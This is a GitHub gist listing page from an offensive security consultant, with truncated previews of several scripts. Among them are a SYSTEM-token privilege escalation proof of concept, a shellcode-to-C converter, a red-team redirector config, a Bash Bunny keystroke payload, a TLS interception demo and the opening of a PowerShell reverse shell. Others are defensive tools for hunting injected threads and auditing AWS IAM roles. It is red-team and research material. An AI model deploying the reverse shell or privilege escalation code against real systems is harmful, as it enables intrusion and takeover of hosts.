Skip to content

Instantly share code, notes, and snippets.

💭
Offensive Sencha Consultant

Mariusz B. mgeeky

💭
Offensive Sencha Consultant
Block or report user

Report or block mgeeky

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@mgeeky
mgeeky / Get-InjectedThread.ps1
Created Feb 7, 2020 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@mgeeky
mgeeky / getsystem_parent.cpp
Created Jan 25, 2020 — forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
View getsystem_parent.cpp
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@mgeeky
mgeeky / bin2c.py
Created Jan 24, 2020
Straightforward python's binary file into C hexstring conversion utility
View bin2c.py
#!/usr/bin/python3
import sys
def main(argv):
if len(argv) != 2:
print('Usag: ./bin2c.py <shellcodeFile>')
return False
with open(argv[1], 'rb') as f:
b = f.read()
@mgeeky
mgeeky / .htaccess
Created Jan 19, 2020 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
View .htaccess
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@mgeeky
mgeeky / RickAstleyBunny.txt
Created Jan 17, 2020
Dancing browser window with never giving up Rick Astley on a Bash Bunny payload
View RickAstleyBunny.txt
#!/bin/bash
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R 200
delay=10
Q GUI r
Q DELAY 100
Q STRING cmd /c start https://www.youtube.com/watch?v=dQw4w9WgXcQ
@mgeeky
mgeeky / InterceptHuzzah.ps1
Last active Jan 15, 2020
Casey Smith's (@subTee) Intercept Huzzah demonstrating means for tls interception due to anomalous Trusted Root CA certificate being injected
View InterceptHuzzah.ps1
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: InterceptHuzzah
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@mgeeky
mgeeky / Get-Whoami.ps1
Last active Jan 12, 2020
This is a modified version of Ruben Boonen's (@fuzzysec) of Get-OSTokenInformation suitable for dumping current process token in a Whoami fashion. Useful for a quick "whoami" without using whoami cmd command. (Source: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-OSTokenInformation.ps1)
View Get-Whoami.ps1
function Get-Whoami {
Get-OSTokenInformation -PrettyPrint
}
function Get-OSTokenInformation {
<#
.SYNOPSIS
Get-OSTokenInformation uses a variety of API's to pull in all (accessible) user tokens and queries them for details.
Notes:
@mgeeky
mgeeky / server-backup.sh
Created Dec 15, 2019
Simple linux server backup script automating use of rsync and 7zip to create a rotated N backup archives.
View server-backup.sh
#!/bin/bash
#
# Simple utility to perform rotated compressed backups.
# Works best when added to crontab:
# 0 21 * * 1 /root/server-backup.sh
#
# Requirements:
# $ sudo apt-get install p7zip-full rsync
#
@mgeeky
mgeeky / evaluate-iam-role.sh
Last active Dec 12, 2019
Evaluates specified AWS IAM Role or Policy given their name/Arn. Dumps all of the attached policies in case of Role and all of defined policy statements. Then goes through allowed permissions to pick all of them out. Finally, checks every allowed permission against a list of known troublesome ones.
View evaluate-iam-role.sh
#!/bin/bash
#
# Evaluates specified AWS IAM Role or Policy given their name/Arn.
# Dumps all of the attached policies in case of Role and all of defined
# policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones.
#
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
# v0.1
#
@mgeeky
mgeeky / mini-reverse.ps1
Last active Nov 25, 2019 — forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
You can’t perform that action at this time.